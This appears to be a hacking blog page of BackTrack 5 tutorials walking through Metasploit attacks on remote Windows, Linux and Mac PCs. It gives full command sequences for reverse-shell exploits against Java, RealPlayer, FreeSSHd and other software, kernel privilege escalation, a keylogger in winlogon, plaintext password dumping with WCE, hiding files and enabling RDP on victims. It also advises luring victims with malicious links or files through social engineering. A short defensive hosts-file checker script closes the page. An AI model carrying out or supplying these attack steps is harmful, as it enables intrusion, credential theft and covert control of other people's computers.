Showing posts with label BackTrack 5 Tutorial.

How to get the Admin Access of Remote PC using Windows Kernel Intel x64 SYSRET Vulnerability Exploit

The shellcode disables kernel code signing and grants NT SYSTEM privileges to a specified application or to an already running process (by PID). The exploit was successfully tested on Windows 7 SP0/SP1 (x64) and Windows 2008 R2 SP1 (x64).

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Download sysret from here and unzip it on your desktop.

Once you have the meterpreter session, use the 'upload' command to copy sysret.exe and MinHook.x64.dll to the victim PC:

upload /root/desktop/sysret/x64/Release/sysret.exe .
upload /root/desktop/sysret/x64/Release/MinHook.x64.dll .



Now use the 'ps' command to display the list of running processes on the target and find the PID of explorer.exe.


The next step is to attach to the explorer.exe process. On the victim, the explorer.exe process ID is 1588. Now type sysret.exe -pid 1588 (replace 1588 with the PID you found).

Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Exploit Targets
VMWare OVF Tools 2.1

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP SP 2

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/ovftool_format_string
msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp
msf exploit (ovftool_format_string)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (ovftool_format_string)>set srvhost 192.168.1.6 (This must be an address on the local machine)
msf exploit (ovftool_format_string)>set uripath / (The Url to use for this exploit)
msf exploit (ovftool_format_string)>exploit  


Now give the URL http://192.168.1.6:8080/ to your victim via chat, email or any social engineering technique.



Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to it.

How to Hide File in Remote Victim PC

Once you have the meterpreter session, use the 'shell' command to get a command prompt on the target.

Type attrib +h +r +s followed by the folder path (for example d:\"Video Folder") and press Enter.

This will hide the "Video Folder" folder on the D drive. The folder stays hidden even when the "Show hidden files and folders" option is enabled, because +s marks it as a protected operating system file; it is still listed by dir /a and reappears once "Hide protected operating system files" is unchecked in Folder Options.

If you want to unhide the folder, just change the parameters from '+' to '-':
attrib -s -h example

To unhide: attrib -h -r -s d:\Foldername

Hack Remote Windows Password using Keylogger in Meterpreter

Once you have the meterpreter session, use the 'ps' command to display the list of running processes on the target.



The next step is to migrate Meterpreter into the winlogon.exe process. On the victim, the winlogon.exe process ID is 600, so type migrate 600. Now we can start the keylogger:

keyscan_start - start the keylogger
keyscan_dump - print the captured keystrokes
keyscan_stop - stop the keylogger

This will capture the credentials of all users logging into the system as long as this is running.

How to Check Enabled Remote Desktop Service in Network with Metasploit

This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type
use auxiliary/scanner/rdp/ms12-020_check
msf auxiliary(ms12-020_check)>set rhosts 192.168.1.1/24 (Target Host Range)
msf auxiliary(ms12-020_check)>set threads 1
msf auxiliary(ms12-020_check)>exploit

Hack Remote Windows Passwords in Plain Text with WCE


Windows Credentials Editor (WCE) is a security tool that allows you to list logon sessions and add, change, list and delete the associated credentials (e.g. LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them on other Windows or Unix systems, and dump the cleartext passwords entered by users at logon. WCE is widely used by security professionals to assess the security of Windows networks during penetration tests. It supports Windows XP, 2003, Vista, 7 and 2008.

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Step 1: Upload wce.exe to the victim PC using
upload /pentest/passwords/wce/wce.exe .
Step 2: Type shell to get the command prompt of the victim PC
Step 3: Now run wce.exe -w to get the passwords in plain text

Windows Manage Memory Payload Injection

This module will inject a payload into the memory of a process. If no payload is selected, it defaults to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, it injects into notepad.exe instead.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/local/payload_inject
msf exploit (payload_inject)>set payload windows/meterpreter/reverse_tcp
msf exploit (payload_inject)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (payload_inject)>set session 1
msf exploit (payload_inject)>exploit 


Attacking a Windows, Linux or Mac PC using Java Applet Method Handle Remote Code Execution

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
Mac OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_method_handle
msf exploit (java_jre17_method_handle)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_method_handle)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (java_jre17_method_handle)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (java_jre17_method_handle)>set uripath javaupdate (The Url to use for this exploit)
msf exploit (java_jre17_method_handle)>exploit 


Now give the URL http://192.168.1.3:8080/javaupdate to your victim.


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to it.



Hack a Windows, Linux or Mac PC using Java Applet AverageRangeStatisticImpl Remote Code Execution

This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
Mac OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_glassfish_averagerangestatisticimpl
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>exploit 


Now give the URL http://192.168.1.3:8080/ to your victim.


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to it.



Exploit Windows PC using Freesshd Authentication Bypass

This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Exploit Targets
FreeSSHd 1.2.6 / Windows

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/ssh/freesshd_authbypass
msf exploit (freesshd_authbypass)>set payload windows/meterpreter/reverse_tcp
msf exploit (freesshd_authbypass)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (freesshd_authbypass)>set rhost 192.168.1.6 (IP of Victim PC)
msf exploit (freesshd_authbypass)>exploit 

Hack a Windows, Linux or Mac PC using Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Exploit Targets
Java 7 Update 10
Windows PC
Linux PC
Mac OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_jre17_jmxbean
msf exploit (java_jre17_jmxbean)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (java_jre17_jmxbean)>set srvhost 192.168.1.5 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean)>exploit 


Now give the URL http://192.168.1.5:8080/ to your victim.


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to it.

Hack Windows PC using Orbital Viewer ORB File Parsing Buffer Overflow

This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from the file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.

Exploit Targets
Orbital Viewer 1.04 

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP SP 2

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/fileformat/orbital_viewer_orb
msf exploit (orbital_viewer_orb)>set payload windows/meterpreter/reverse_tcp
msf exploit (orbital_viewer_orb)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (orbital_viewer_orb)>exploit


After the malicious ORB file is successfully generated, it is stored on your local computer at
/root/.msf4/local/msf.orb


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.orb file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Hack Windows PC using CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x. The vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets
CyberLink Power2Go 8

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/fileformat/cyberlink_p2g_bof
msf exploit (cyberlink_p2g_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cyberlink_p2g_bof)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (cyberlink_p2g_bof)>exploit


After the malicious p2g file is successfully generated, it is stored on your local computer at
/root/.msf4/local/msf.p2g


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.p2g file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

Attacking a Windows PC using RealPlayer RealMedia File Handling Buffer Overflow

This module exploits a stack-based buffer overflow in RealPlayer <= 15.0.6.14. The vulnerability exists in the handling of RealMedia files, due to the insecure use of the GetPrivateProfileString function to retrieve the URL property from an Internet Shortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets
RealPlayer 15.0.5.109

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/fileformat/real_player_url_property_bof

msf exploit (real_player_url_property_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (real_player_url_property_bof)>exploit   


After the malicious rm file is successfully generated, it is stored on your local computer at
/root/.msf4/local/msf.rm


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.rm file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


How to Enable Remote Desktop in Victim PC using Metasploit

This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target's port 3389/tcp.

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Step 1: Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Step 2: Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

Step 3: Open your backtrack terminal and type msfconsole


msf > use post/windows/manage/enable_rdp
msf post(enable_rdp) > set session 2
msf post(enable_rdp) > exploit

Hosts File Injection in Remote Windows 7 PC using Metasploit

This module allows the attacker to insert a new entry into the target system's hosts file.

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Step 1: Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Step 2: Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

Step 3: Open your backtrack terminal and type msfconsole


msf > use post/windows/manage/inject_host
msf post(inject_host) > set domain www.hackingarticles.in
msf post(inject_host) > set ip 74.125.236.16 (Your Desired IP)
msf post(inject_host) > set session 2
msf post(inject_host) > exploit
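From the defender's side, an injection like the one above leaves a plain line in the hosts file, so the check is a baseline comparison. The script below is an added example (not from the page or from Metasploit): it parses hosts-file text, ignores comments, and returns every mapping that is not in a known-good baseline; the sample hosts content, the baseline set and the file path are constructed assumptions.

```python
"""Flag unexpected hosts-file entries (added example, not from the page)."""
import re
from pathlib import Path

# Default Windows hosts file location; only read when check_hosts_file() is called.
WINDOWS_HOSTS = Path(r"C:\Windows\System32\drivers\etc\hosts")

# Constructed baseline: the loopback entries a stock Windows hosts file carries.
BASELINE = {
    ("127.0.0.1", "localhost"),
    ("::1", "localhost"),
}


def parse_hosts(text):
    """Yield (ip, hostname) pairs, skipping blank lines, comments and inline '#' notes."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop everything after an inline comment
        if not line:
            continue
        fields = re.split(r"\s+", line)
        if len(fields) < 2:
            continue  # malformed line with no hostname; nothing to map
        ip, names = fields[0], fields[1:]
        for name in names:  # one IP may be followed by several hostnames
            yield ip, name.lower()


def find_unexpected(text, baseline=BASELINE):
    """Return every (ip, hostname) mapping that is not in the baseline, in file order."""
    return [entry for entry in parse_hosts(text) if entry not in baseline]


def check_hosts_file(path=WINDOWS_HOSTS, baseline=BASELINE):
    """Read a real hosts file from disk and return its unexpected mappings."""
    return find_unexpected(path.read_text(encoding="utf-8", errors="replace"), baseline)


# Constructed sample: stock comment lines, the two default entries, and one injected line
# of the form the inject_host module writes (domain and IP taken from the page above).
SAMPLE_HOSTS = """\
# Sample HOSTS file (constructed for this example)
# Comment lines start with '#'.
127.0.0.1       localhost
::1             localhost
74.125.236.16   www.hackingarticles.in   # injected entry
"""

if __name__ == "__main__":
    for ip, host in find_unexpected(SAMPLE_HOSTS):
        print(f"unexpected hosts entry: {host} -> {ip}")
```

Run it periodically (or from a file-integrity monitor) and alert on any non-empty result; a mapping that redirects a public site to an address you do not own is the signature of this technique.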